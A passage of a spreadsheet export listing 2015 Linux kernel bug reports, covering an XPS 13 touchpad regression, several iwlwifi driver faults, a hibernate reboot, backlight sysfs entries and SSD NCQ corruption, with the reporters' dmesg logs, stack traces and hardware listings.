    <t>Created attachment 182531 [details] dmesg for 4.2-rc2 Booting my Dell XPS 13 (9343) with 4.2-rc2 the touchpad is no longer detected by the i2c_hid driver. Dmesg shows: [ 4.040117] i2c_designware INT3433:00: controller timed out [ 4.068461] i2c_designware INT3433:00: timeout in disabling adapter [ 4.068469] i2c_hid i2c-DLL0665:01: hid_descr_cmd failed While booting with 4.1.1 it worked fine and dmesg showed: [ 3.051669] i2c_hid i2c-DLL0665:01: failed to retrieve report from device. [ 3.062036] i2c_hid i2c-DLL0665:01: failed to retrieve report from device. [ 3.062705] i2c_hid i2c-DLL0665:01: failed to retrieve report from device. [ 3.064201] i2c_hid i2c-DLL0665:01: failed to retrieve report from device. [ 3.064401] input: DLL0665:01 06CB:76AD UNKNOWN as /devices/pci0000:00/INT3433:00/i2c-9/i2c-DLL0665:01/0018:06CB:76AD.0002/input/input14 [ 3.064527] hid-multitouch 0018:06CB:76AD.0002: input,hidraw1: &lt;UNKNOWN&gt; HID v1.00 Mouse [DLL0665:01 06CB:76AD] on</t>
  </si>
  <si>
    <t>iwlwifi: WARNING when setting Tx power with WEXT while in RFKILL - MWG100249491</t>
  </si>
  <si>
    <t>4.1.2</t>
  </si>
  <si>
    <t>2015-07-14 20:35 UTC</t>
  </si>
  <si>
    <t>2015-11-02 19:42 UTC</t>
  </si>
  <si>
    <t>Created attachment 182661 [details] lspci -vvvx I am testing vanilla linux-4.1.2 kernel on Dell Vostro 3550 laptop with A12 BIOS. During cold boot I received: [ 20.114785] r8169 0000:05:00.0: Direct firmware load for rtl_nic/rtl8168e-2.fw failed with error -2 [ 20.114795] r8169 0000:05:00.0 enp5s0: unable to load firmware patch rtl_nic/rtl8168e-2.fw (-2) [ 20.138835] r8169 0000:05:00.0 enp5s0: link down [ 20.493918] ------------[ cut here ]------------ [ 20.493928] WARNING: CPU: 2 PID: 3162 at net/mac80211/driver-ops.h:12 ieee80211_bss_info_change_notify+0x1e2/0x1f0() [ 20.493930] wlp9s0: Failed check-sdata-in-driver check, flags: 0x0 [ 20.493931] Modules linked in: fuse x86_pkg_temp_thermal intel_powerclamp kvm_intel kvm ums_realtek uas iwldvm usb_storage iwlwifi dell_smo8800 [ 20.493942] CPU: 2 PID: 3162 Comm: iwconfig Not tainted 4.1.2-default-pciehp #2 [ 20.493943] Hardware name: Dell Inc. Vostro 3550/, BIOS A12 02/18/2014 [ 20.493945] ffffffff81dadc75 ffff88040aff7b68 ffffffff819c6a7d ffffffff81128822 [ 20.493947] ffff88040aff7bb8 ffff88040aff7ba8 ffffffff810d2f05 0000000000000000 [ 20.493950] 0000000000040000 ffff8800d97089e0 ffff88040ced4a00 ffff8800d9708460 [ 20.493952] Call Trace: [ 20.493957] [&lt;ffffffff819c6a7d&gt;] dump_stack+0x45/0x57 [ 20.493960] [&lt;ffffffff81128822&gt;] ? console_unlock+0x282/0x4a0 [ 20.493963] [&lt;ffffffff810d2f05&gt;] warn_slowpath_common+0x85/0xc0 [ 20.493965] [&lt;ffffffff810d2f81&gt;] warn_slowpath_fmt+0x41/0x50 [ 20.493967] [&lt;ffffffff8195b1d2&gt;] ieee80211_bss_info_change_notify+0x1e2/0x1f0 [ 20.493970] [&lt;ffffffff81974afd&gt;] ieee80211_recalc_txpower+0x2d/0x40 [ 20.493973] [&lt;ffffffff8197bab7&gt;] ieee80211_set_tx_power+0x47/0x1a0 [ 20.493975] [&lt;ffffffff81955bea&gt;] cfg80211_wext_siwtxpower+0xaa/0x1d0 [ 20.493977] [&lt;ffffffff81958b9f&gt;] ioctl_standard_call+0x4f/0xe0 [ 20.493979] [&lt;ffffffff81958b50&gt;] ? ioctl_standard_iw_point+0x3a0/0x3a0 [ 20.493981] [&lt;ffffffff8195873d&gt;] wireless_process_ioctl.constprop.9+0x8d/0x100 [ 20.493983] [&lt;ffffffff81958ddd&gt;] wext_handle_ioctl+0x5d/0xb0 [ 20.493985] [&lt;ffffffff81806fd9&gt;] dev_ioctl+0x339/0x6f0 [ 20.493990] [&lt;ffffffff817ce2a2&gt;] sock_ioctl+0x142/0x2e0 [ 20.493993] [&lt;ffffffff81210968&gt;] do_vfs_ioctl+0x2f8/0x530 [ 20.493996] [&lt;ffffffff8121c4a4&gt;] ? __fget_light+0x64/0x90 [ 20.493998] [&lt;ffffffff81210bdc&gt;] SyS_ioctl+0x3c/0x80 [ 20.494001] [&lt;ffffffff819d279b&gt;] system_call_fastpath+0x16/0x73 [ 20.494002] ---[ end trace 0c521a819f5fe0d4 ]--- [ 21.784629] r8169 0000:05:00.0 enp5s0: link up 05:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller (rev 06) 09:00.0 Network controller: Intel Corporation Centrino Wireless-N 1030 [Rainbow Peak] (rev 34) 05:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller (rev 06) Subsystem: Dell RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller Flags: bus master, fast devsel, latency 0, IRQ 30 I/O ports at e000 [size=256] Memory at f1104000 (64-bit, prefetchable) [size=4K] Memory at f1100000 (64-bit, prefetchable) [size=16K] Capabilities: [40] Power Management version 3 Capabilities: [50] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [70] Express Endpoint, MSI 01 Capabilities: [b0] MSI-X: Enable- Count=4 Masked- Capabilities: [d0] Vital Product Data Capabilities: [100] Advanced Error Reporting Capabilities: [140] Virtual Channel Capabilities: [160] Device Serial Number 01-00-00-00-68-4c-e0-00 Kernel driver in use: r8169 09:00.0 Network controller: Intel Corporation Centrino Wireless-N 1030 [Rainbow Peak] (rev 34) Subsystem: Intel Corporation Centrino Wireless-N 1030 BGN Flags: bus master, fast devsel, latency 0, IRQ 42 Memory at f7e00000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [e0] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number 4c-80-93-ff-ff-15-e6-c7 Kernel driver in use: iwlwifi Kernel modules: iwlwifi</t>
  </si>
  <si>
    <t>[BYT-M ]System will reboot after do S4 about several times</t>
  </si>
  <si>
    <t>4.2.0-rc2 64bits</t>
  </si>
  <si>
    <t>2015-07-15 08:51 UTC</t>
  </si>
  <si>
    <t>tianye</t>
  </si>
  <si>
    <t>2015-09-14 06:06 UTC</t>
  </si>
  <si>
    <t>Created attachment 182681 [details] dmesg info Hardware: Lenovo G40 BYT-M CPU:N2930 1.83GHz 4Cores/4Threads System will reboot after do S4 about several times with kernel 4.2_rc2 on BYT-M.</t>
  </si>
  <si>
    <t>iwlwifi WPA/WPA2 + TLS cannot connect without reloading module</t>
  </si>
  <si>
    <t>4.1.3</t>
  </si>
  <si>
    <t>2015-07-26 03:46 UTC</t>
  </si>
  <si>
    <t>2015-09-16 17:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 183651 [details] dmesg After upgrading to 4.1.2 and 4.1.3 I wound that after fresh reboot I can connect to corporate network configured with WPA/WPA2 TLS. But once I disconnect (laptop get to sleep mode or I switch to other network) I cannot connect to corporate network anymore. The only workaround without reboot is to unload and reload iwlwifi module. Then I can connect again. My HW: Thinkpad X1 Carbon 3rd gen &gt; lspci 00:00.0 Host bridge: Intel Corporation Broadwell-U Host Bridge -OPI (rev 09) 00:02.0 VGA compatible controller: Intel Corporation Broadwell-U Integrated Graphics (rev 09) 00:03.0 Audio device: Intel Corporation Broadwell-U Audio Controller (rev 09) 00:14.0 USB controller: Intel Corporation Wildcat Point-LP USB xHCI Controller (rev 03) 00:16.0 Communication controller: Intel Corporation Wildcat Point-LP MEI Controller #1 (rev 03) 00:19.0 Ethernet controller: Intel Corporation Ethernet Connection (3) I218-LM (rev 03) 00:1b.0 Audio device: Intel Corporation Wildcat Point-LP High Definition Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation Wildcat Point-LP PCI Express Root Port #2 (rev e3) 00:1c.1 PCI bridge: Intel Corporation Wildcat Point-LP PCI Express Root Port #3 (rev e3) 00:1d.0 USB controller: Intel Corporation Wildcat Point-LP USB EHCI Controller (rev 03) 00:1f.0 ISA bridge: Intel Corporation Wildcat Point-LP LPC Controller (rev 03) 00:1f.2 SATA controller: Intel Corporation Wildcat Point-LP SATA Controller [AHCI Mode] (rev 03) 00:1f.3 SMBus: Intel Corporation Wildcat Point-LP SMBus Controller (rev 03) 00:1f.6 Signal processing controller: Intel Corporation Wildcat Point-LP Thermal Management Controller (rev 03) 04:00.0 Network controller: Intel Corporation Wireless 7265 (rev 59) &gt; lsusb Bus 001 Device 002: ID 8087:8001 Intel Corp. Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 003 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 002 Device 007: ID 04f2:b45d Chicony Electronics Co., Ltd Bus 002 Device 006: ID 8087:0a2a Intel Corp. Bus 002 Device 005: ID 138a:0017 Validity Sensors, Inc. Fingerprint Reader Bus 002 Device 004: ID 04f3:012d Elan Microelectronics Corp. Bus 002 Device 064: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 002 Device 002: ID 1050:0010 Yubico.com Yubikey Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub</t>
  </si>
  <si>
    <t>iwlwifi: iwlmvm: IBSS unable to associate to existing cell - MWG100244441</t>
  </si>
  <si>
    <t>4.0, 4.1, 4.2rc4</t>
  </si>
  <si>
    <t>2015-08-04 13:05 UTC</t>
  </si>
  <si>
    <t>Francesco Frassinelli</t>
  </si>
  <si>
    <t>2016-01-24 07:00 UTC</t>
  </si>
  <si>
    <t>How to reproduce: # ifconfig wlp3s0 down # iwconfig wlp3s0 mode ad-hoc # iwconfig wlp3s0 essid 'Igloo mesh' # ifconfig wlp3s0 up # dmesg | tail -n8 [ 607.376655] iwlwifi 0000:03:00.0: L1 Disabled - LTR Enabled [ 607.376816] iwlwifi 0000:03:00.0: L1 Disabled - LTR Enabled [ 607.388724] IPv6: ADDRCONF(NETDEV_UP): wlp3s0: link is not ready [ 609.411270] wlp3s0: Trigger new scan to find an IBSS to join [ 612.410279] wlp3s0: Trigger new scan to find an IBSS to join [ 615.405271] wlp3s0: Trigger new scan to find an IBSS to join [ 615.682699] wlp3s0: Creating new IBSS network, BSSID 92:0e:b7:a6:2b:76 # iwlist wlp3s0 scan wlp3s0 Failed to read scan data : Resource temporarily unavailable # iwlist wlp3s0 scan wlp3s0 Interface doesn't support scanning : Device or resource busy It tries to find an existing IBSS, but it fails, even if it exists and I can connect correctly with other devices. Details: # uname -a Linux winston 4.0.4-301.fc22.x86_64 #1 SMP Thu May 21 13:10:33 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux # uname -r 4.0.4-301.fc22.x86_64 # rpm -q iwl7260-firmware iwl7260-firmware-25.17.12.0-53.fc22.noarch # lspci -nn | grep 7265 03:00.0 Network controller [0280]: Intel Corporation Wireless 7265 [8086:095a] (rev 59) Affected versions: It occurs in 4.0, 4.1, 4.2 (from rc0 to rc4). 4.2rc5 and newer not tested. It does not occur with Ralink and Atheros devices. Additional details: https://bugzilla.redhat.com/show_bug.cgi?id=1228190 (I don't know if it's strictly related with adhoc mode and it's difficult to reproduce, so I didn't create a new bug here, upstream).</t>
  </si>
  <si>
    <t>WARNING: CPU: 3 PID: 827 at lib/dma-debug.c:1169 check_for_stack+0x94/0xe0()</t>
  </si>
  <si>
    <t>4.2.0-0.rc6.git0.1.fc24.x86_64+debug</t>
  </si>
  <si>
    <t>2015-08-11 08:19 UTC</t>
  </si>
  <si>
    <t>poma</t>
  </si>
  <si>
    <t>2015-09-04 13:55 UTC</t>
  </si>
  <si>
    <t>[ 43.378891] ------------[ cut here ]------------ [ 43.379505] WARNING: CPU: 3 PID: 827 at lib/dma-debug.c:1169 check_for_stack+0x94/0xe0() [ 43.380100] ehci-pci 0000:00:02.1: DMA-API: device driver maps memory from stack [addr=ffff8800bc6dfa3c] [ 43.380673] Modules linked in: ... mt7601u(+) mac80211 ... cfg80211 rfkill ... [ 43.384779] CPU: 3 PID: 827 Comm: systemd-udevd Not tainted 4.2.0-0.rc6.git0.1.fc24.x86_64+debug #1 ... [ 43.388131] Call Trace: [ 43.388776] [&lt;ffffffff81868d8e&gt;] dump_stack+0x4c/0x65 [ 43.389406] [&lt;ffffffff810ab406&gt;] warn_slowpath_common+0x86/0xc0 [ 43.390044] [&lt;ffffffff810ab495&gt;] warn_slowpath_fmt+0x55/0x70 [ 43.390668] [&lt;ffffffff81871e26&gt;] ? _raw_spin_unlock_irqrestore+0x36/0x60 [ 43.391306] [&lt;ffffffff81450044&gt;] check_for_stack+0x94/0xe0 [ 43.391943] [&lt;ffffffff8145062b&gt;] debug_dma_map_page+0xfb/0x140 [ 43.392558] [&lt;ffffffff81614eb8&gt;] usb_hcd_map_urb_for_dma+0x608/0x760 [ 43.393199] [&lt;ffffffff8161548d&gt;] usb_hcd_submit_urb+0x1cd/0xab0 [ 43.393815] [&lt;ffffffff8110315f&gt;] ? save_trace+0x3f/0xc0 [ 43.394407] [&lt;ffffffff81106edd&gt;] ? mark_held_locks+0x7d/0xb0 [ 43.395016] [&lt;ffffffff8110ddd5&gt;] ? __raw_spin_lock_init+0x25/0x60 [ 43.395608] [&lt;ffffffff81103b73&gt;] ? lockdep_init_map+0x73/0x640 [ 43.396212] [&lt;ffffffff81107039&gt;] ? trace_hardirqs_on_caller+0x129/0x1b0 [ 43.396826] [&lt;ffffffff8161707c&gt;] usb_submit_urb+0x3fc/0x5a0 [ 43.397414] [&lt;ffffffff81617947&gt;] usb_start_wait_urb+0x77/0x180 [ 43.398013] [&lt;ffffffff8124a83e&gt;] ? __kmalloc+0x28e/0x360 [ 43.398598] [&lt;ffffffff81617b2c&gt;] usb_control_msg+0xdc/0x130 [ 43.399214] [&lt;ffffffffa0850510&gt;] mt7601u_vendor_request+0xf0/0x310 [mt7601u] [ 43.399819] [&lt;ffffffff8186f4dc&gt;] ? __mutex_unlock_slowpath+0xbc/0x180 [ 43.400419] [&lt;ffffffffa08507b9&gt;] mt7601u_rr+0x59/0x280 [mt7601u] [ 43.401039] [&lt;ffffffff8161b738&gt;] ? usb_autosuspend_device+0x28/0x30 [ 43.401631] [&lt;ffffffffa0857c93&gt;] mt7601u_wait_asic_ready+0x23/0x60 [mt7601u] [ 43.402244] [&lt;ffffffffa0850ac0&gt;] mt7601u_probe+0xe0/0x220 [mt7601u] [ 43.402836] [&lt;ffffffff8161c03b&gt;] usb_probe_interface+0x1bb/0x2e0 [ 43.403413] [&lt;ffffffff81579f26&gt;] driver_probe_device+0x1f6/0x450 [ 43.404004] [&lt;ffffffff8157a214&gt;] __driver_attach+0x94/0xa0 [ 43.404570] [&lt;ffffffff8157a180&gt;] ? driver_probe_device+0x450/0x450 [ 43.405159] [&lt;ffffffff815778f3&gt;] bus_for_each_dev+0x73/0xc0 [ 43.405732] [&lt;ffffffff815796fe&gt;] driver_attach+0x1e/0x20 [ 43.406325] [&lt;ffffffff8157922e&gt;] bus_add_driver+0x1ee/0x280 [ 43.406929] [&lt;ffffffff8157b0a0&gt;] driver_register+0x60/0xe0 [ 43.407503] [&lt;ffffffff8161a87d&gt;] usb_register_driver+0xad/0x160 [ 43.408100] [&lt;ffffffffa086e000&gt;] ? 0xffffffffa086e000 [ 43.408674] [&lt;ffffffffa086e01e&gt;] mt7601u_driver_init+0x1e/0x20 [mt7601u] [ 43.409278] [&lt;ffffffff81002123&gt;] do_one_initcall+0xb3/0x200 [ 43.409870] [&lt;ffffffff8124ac65&gt;] ? kmem_cache_alloc_trace+0x355/0x380 [ 43.410435] [&lt;ffffffff81867c37&gt;] ? do_init_module+0x28/0x1e9 [ 43.411014] [&lt;ffffffff81867c6f&gt;] do_init_module+0x60/0x1e9 [ 43.411558] [&lt;ffffffff81154167&gt;] load_module+0x21f7/0x28d0 [ 43.412112] [&lt;ffffffff8114f600&gt;] ? m_show+0x1b0/0x1b0 [ 43.412638] [&lt;ffffffff81026d79&gt;] ? sched_clock+0x9/0x10 [ 43.413175] [&lt;ffffffff810e6ddc&gt;] ? local_clock+0x1c/0x20 [ 43.413681] [&lt;ffffffff811549b8&gt;] SyS_init_module+0x178/0x1c0 [ 43.414204] [&lt;ffffffff8187282e&gt;] entry_SYSCALL_64_fastpath+0x12/0x76 [ 43.414695] ---[ end trace 0c0ff6cd25624338 ]---</t>
  </si>
  <si>
    <t>Srinivas Pandruvada</t>
  </si>
  <si>
    <t>hrtimer patch makes playing videos lag</t>
  </si>
  <si>
    <t>3.19.0-rc5-00002-g9bc74919</t>
  </si>
  <si>
    <t>2015-08-29 17:30 UTC</t>
  </si>
  <si>
    <t>Boris Faure</t>
  </si>
  <si>
    <t>Created attachment 186181 [details] dmesg I have updated some time ago from a 3.18.11 to a 4.0.5 and noticed that my thinkpad x220 could no longer play correctly videos. I have git-bisected and found that the culprit patch is the following one: 9bc7491906b4 hrtimer: Prevent stale expiry time in hrtimer_interrupt() Before that patch, I can play videos flawlessly but with it playing videos with mpv is a bad experience as the video stops playing for a tenth of second every second or so.</t>
  </si>
  <si>
    <t>Esprimo Mobile 9410: Two acpi_video* devices in sysfs, only one working</t>
  </si>
  <si>
    <t>4.2.0-0.rc5</t>
  </si>
  <si>
    <t>2015-09-06 19:09 UTC</t>
  </si>
  <si>
    <t>Christian Scharl</t>
  </si>
  <si>
    <t>2015-11-13 03:18 UTC</t>
  </si>
  <si>
    <t>Created attachment 186931 [details] acpidump of Esprimo Mobile M9410 Under /sys/class/backlight there are two entries: [xxx@yyy ~]$ ls -l /sys/class/backlight/ lrwxrwxrwx. 1 root root 0 6. Sep 2015 acpi_video0 -&gt; ../../devices/pci0000:00/0000:00:02.0/backlight/acpi_video0 lrwxrwxrwx. 1 root root 0 6. Sep 2015 acpi_video1 -&gt; ../../devices/pci0000:00/0000:00:02.0/backlight/acpi_video1 When writing manually a new value to acpi_video0/brightness the backlight is not changing. Do the same with acpi_video1/brightness is changing the backlight. Both entries are of type firmware. As a result, the backlight can not be changed from the gnome shell slider (gnome 3.16), gsd-backlight-helper and xbacklight. xbacklight is working, when acpi_video1 is defined as the backlight device in an xorg.conf.d file. Here the output of all files in the acpi_video* folder. In addition I attache an acpidump. If any additional information is needed, please let me know and I try to get it. [xxx@yyy ~]$ grep . -r /sys/class/backlight/* /sys/class/backlight/acpi_video0/type:firmware /sys/class/backlight/acpi_video0/brightness:4 /sys/class/backlight/acpi_video0/power/control:auto /sys/class/backlight/acpi_video0/power/async:disabled /sys/class/backlight/acpi_video0/power/runtime_enabled:disabled /sys/class/backlight/acpi_video0/power/runtime_active_kids:0 /sys/class/backlight/acpi_video0/power/runtime_active_time:0 grep: /sys/class/backlight/acpi_video0/power/autosuspend_delay_ms: Eingabe-/Ausgabefehler /sys/class/backlight/acpi_video0/power/runtime_status:unsupported /sys/class/backlight/acpi_video0/power/runtime_usage:0 /sys/class/backlight/acpi_video0/power/runtime_suspended_time:0 /sys/class/backlight/acpi_video0/bl_power:0 /sys/class/backlight/acpi_video0/max_brightness:10 /sys/class/backlight/acpi_video0/actual_brightness:4 /sys/class/backlight/acpi_video1/type:firmware /sys/class/backlight/acpi_video1/brightness:7 /sys/class/backlight/acpi_video1/power/control:auto /sys/class/backlight/acpi_video1/power/async:disabled /sys/class/backlight/acpi_video1/power/runtime_enabled:disabled /sys/class/backlight/acpi_video1/power/runtime_active_kids:0 /sys/class/backlight/acpi_video1/power/runtime_active_time:0 grep: /sys/class/backlight/acpi_video1/power/autosuspend_delay_ms: Eingabe-/Ausgabefehler /sys/class/backlight/acpi_video1/power/runtime_status:unsupported /sys/class/backlight/acpi_video1/power/runtime_usage:0 /sys/class/backlight/acpi_video1/power/runtime_suspended_time:0 /sys/class/backlight/acpi_video1/bl_power:0 /sys/class/backlight/acpi_video1/max_brightness:7 /sys/class/backlight/acpi_video1/actual_brightness:7</t>
  </si>
  <si>
    <t>NCQ writes on encrypted Samsung SSD 850 EVO cause data corruption</t>
  </si>
  <si>
    <t>4.1.6</t>
  </si>
  <si>
    <t>2015-09-11 16:27 UTC</t>
  </si>
  <si>
    <t>throwaway42</t>
  </si>
  <si>
    <t>2015-11-10 02:59 UTC</t>
  </si>
  <si>
    <t>Created attachment 187411 [details] dmesg ata errors The affected drive contains my root partition, the following specs apply: SSD Model: Samsung SSD 850 EVO 500GB SSD Firmware: EMT01B6Q" Partition encrypted with luks, header info: Version: 1 Cipher name: aes Cipher mode: xts-plain Hash spec: sha1 NCQ enabled TRIM not enabled Filesystem in LUKS container: f2fs lsblk -f sda ├─sda1 vfat 5A43-9F90 ├─sda2 vfat kernel 5996-1372 └─sda3 crypto_LUKS 35200bb8-4634-4216-879b-909aae3f460d └─luks-35200bb8-4634-4216-879b-909aae3f460d f2fs gentoo a663bae5-b7cc-461e-8050-ca8477b3d79a / If I start my system with a Kernel &gt;=4.0, my root partition will become readonly after a while. DMESG then shows the ATA errors as seen in the attachment. I can trigger the problem by writing a huge file into a folder on the root partition. After ~20s the partition will be "ro" and dmesg will be full of ata errors. On LTS Kernel 3.18 the problem doesn't exist yet. I found a thread on the dm-crypt mailing list where someone describes the same problem also on an ssd with dmcrypt + f2fs, in contrast to my setup he also uses lvm: https://www.redhat.com/archives/dm-devel/2015-May/msg00001.html</t>
  </si>
  <si>
    <t>iwlwifi: 7260: Tx queues stuck when injecting traffic in monitor mode - MWG100247590</t>
  </si>
  <si>
    <t>2015-09-15 14:31 UTC</t>
  </si>
  <si>
    <t>eli stutz</t>
  </si>
  <si>
    <t>2015-12-12 06:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 187591 [details] lspci and iw list After enabling monitor mode I saw the error "Microcode SW error detected. Restarting 0x2000000", followed by "Hardware restart was requested". Apart from this, the wifi on this notebook is working fine. [ 1.574477] iwlwifi 0000:02:00.0: loaded firmware version 25.30.13.0 op_mode iwlmvm [ 1.614503] iwlwifi 0000:02:00.0: Detected Intel(R) Dual Band Wireless AC 3160, REV=0x164 ... [ 35.432334] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 35.432957] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 35.537460] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 35.538082] iwlwifi 0000:02:00.0: L1 Enabled - LTR Enabled [ 70.963353] device wlp2s0mon entered promiscuous mode [ 116.613585] device wlp2s0mon left promiscuous mode [ 168.245948] device wlp2s0mon entered promiscuous mode [ 178.402457] iwlwifi 0000:02:00.0: Queue 0 stuck for 10000 ms. [ 178.403785] iwlwifi 0000:02:00.0: Current SW read_ptr 0 write_ptr 6 [ 178.404996] iwl data: 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ [ 178.406194] iwlwifi 0000:02:00.0: FH TRBs(0) = 0x00000000 [ 178.407261] iwlwifi 0000:02:00.0: FH TRBs(1) = 0x00000000 [ 178.408252] iwlwifi 0000:02:00.0: FH TRBs(2) = 0x00000000 [ 178.409424] iwlwifi 0000:02:00.0: FH TRBs(3) = 0x00000000 [ 178.410428] iwlwifi 0000:02:00.0: FH TRBs(4) = 0x00000000 [ 178.411396] iwlwifi 0000:02:00.0: FH TRBs(5) = 0x00000000 [ 178.412351] iwlwifi 0000:02:00.0: FH TRBs(6) = 0x00000000 [ 178.413461] iwlwifi 0000:02:00.0: FH TRBs(7) = 0x007090b2 [ 178.414483] iwlwifi 0000:02:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [0,6] [ 178.415458] iwlwifi 0000:02:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] [ 178.416561] iwlwifi 0000:02:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [0,0] [ 178.417494] iwlwifi 0000:02:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.418385] iwlwifi 0000:02:00.0: Q 4 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.419424] iwlwifi 0000:02:00.0: Q 5 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.420319] iwlwifi 0000:02:00.0: Q 6 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.421190] iwlwifi 0000:02:00.0: Q 7 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.422049] iwlwifi 0000:02:00.0: Q 8 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.423028] iwlwifi 0000:02:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [179,179] [ 178.423874] iwlwifi 0000:02:00.0: Q 10 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.424677] iwlwifi 0000:02:00.0: Q 11 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.425478] iwlwifi 0000:02:00.0: Q 12 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.426432] iwlwifi 0000:02:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.427257] iwlwifi 0000:02:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.428029] iwlwifi 0000:02:00.0: Q 15 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] [ 178.428807] iwlwifi 0000:02:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.429781] iwlwifi 0000:02:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.430594] iwlwifi 0000:02:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.431354] iwlwifi 0000:02:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] [ 178.432259] iwlwifi 0000:02:00.0: Microcode SW error detected. Restarting 0x2000000. [ 178.434223] iwlwifi 0000:02:00.0: CSR values: [ 178.436159] iwlwifi 0000:02:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) [ 178.438280] iwlwifi 0000:02:00.0: CSR_HW_IF_CONFIG_REG: 0X00489204 [ 178.440322] iwlwifi 0000:02:00.0: CSR_INT_COALESCING: 0X80000040 [ 178.442056] iwlwifi 0000:02:00.0: CSR_INT: 0X00000000 [ 178.443783] iwlwifi 0000:02:00.0: CSR_INT_MASK: 0X00000000 [ 178.445454] iwlwifi 0000:02:00.0: CSR_FH_INT_STATUS: 0X00000000 [ 178.447118] iwlwifi 0000:02:00.0: CSR_GPIO_IN: 0X00000000 [ 178.448740] iwlwifi 0000:02:00.0: CSR_RESET: 0X00000000 [ 178.450179] iwlwifi 0000:02:00.0: CSR_GP_CNTRL: 0X080403c5 [ 178.451539] iwlwifi 0000:02:00.0: CSR_HW_REV: 0X00000164 [ 178.452898] iwlwifi 0000:02:00.0: CSR_EEPROM_REG: 0X00000000 [ 178.454247] iwlwifi 0000:02:00.0: CSR_EEPROM_GP: 0X80000000 [ 178.455590] iwlwifi 0000:02:00.0: CSR_OTP_GP_REG: 0X803a0000 [ 178.456689] iwlwifi 0000:02:00.0: CSR_GIO_REG: 0X001f0042 [ 178.457691] iwlwifi 0000:02:00.0: CSR_GP_UCODE_REG: 0X00000000 [ 178.458688] iwlwifi 0000:02:00.0: CSR_GP_DRIVER_REG: 0X00000000 [ 178.459693] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP1: 0X00000000 [ 178.460689] iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP2: 0X00000000 [ 178.461672] iwlwifi 0000:02:00.0: CSR_LED_REG: 0X00000060 [ 178.462668] iwlwifi 0000:02:00.0: CSR_DRAM_INT_TBL_REG: 0X8840bf26 [ 178.463645] iwlwifi 0000:02:00.0: CSR_GIO_CHICKEN_BITS: 0X27800200 [ 178.464616] iwlwifi 0000:02:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 [ 178.465586] iwlwifi 0000:02:00.0: CSR_MONITOR_STATUS_REG: 0X6bb7f757 [ 178.466554] iwlwifi 0000:02:00.0: CSR_HW_REV_WA_REG: 0X0001001a [ 178.467512] iwlwifi 0000:02:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0000 [ 178.468309] iwlwifi 0000:02:00.0: FH register values: [ 178.469409] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_STTS_WPTR_REG: 0X0d7ad700 [ 178.470313] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_RBDCB_BASE_REG: 0X00d7ad80 [ 178.471215] iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_WPTR: 0X000000c0 [ 178.472103] iwlwifi 0000:02:00.0: FH_MEM_RCSR_CHNL0_CONFIG_REG: 0X00801114 [ 178.472981] iwlwifi 0000:02:00.0: FH_MEM_RSSR_SHARED_CTRL_REG: 0X000000fc [ 178.473844] iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_STATUS_REG: 0X03030000 [ 178.474705] iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_ENABLE_ERR_IRQ2DRV: 0X00000000 [ 178.475569] iwlwifi 0000:02:00.0: FH_TSSR_TX_STATUS_REG: 0X07ff0001 [ 178.476429] iwlwifi 0000:02:00.0: FH_TSSR_TX_ERROR_REG: 0X00000000 [ 178.477375] iwlwifi 0000:02:00.0: Start IWL Error Log Dump: [ 178.478052] iwlwifi 0000:02:00.0: Status: 0x00000000, count: 6 [ 178.478716] iwlwifi 0000:02:00.0: Loaded firmware version: 25.30.13.0 [ 178.479359] iwlwifi 0000:02:00.0: 0x00000084 | 